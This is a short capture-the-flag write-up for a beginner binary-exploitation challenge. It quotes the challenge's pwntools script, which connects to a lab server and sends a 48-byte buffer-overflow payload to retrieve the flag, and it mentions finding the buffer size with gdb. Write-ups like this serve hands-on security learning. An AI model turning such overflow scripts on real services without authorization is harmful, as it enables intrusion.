Getting Started

Personal Rating: Easy

This was a valuable challenge for me as it demonstrates the basics of binary exploitation (pwn).

We have a server with an open port at which we can interact with a binary that we have to exploit. But the exploit script already comes with the challenge resources:

#!/usr/bin/python3.8

'''
You need to install pwntools to run the script.
To run the script: python3 ./wrapper.py
'''

# Library
from pwn import *

# Open connection
IP   = '142.93.38.14' # Change this
PORT = 32459      # Change this

r    = remote(IP, PORT)

# Craft payload
payload = b'A' * 40 + b'B' * 8 # Change the number of "A"s

# Send payload
r.sendline(payload)

# Read flag
success(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}')

Following the challenge tips, this was basically as easy as executing the script. But you had to find out the number of buffer bytes, which could be done by analyzing the file in gdb with gef.

PreviousExtraterrestrial Persistence NextNeedle in the Haystack

Last updated 1 year ago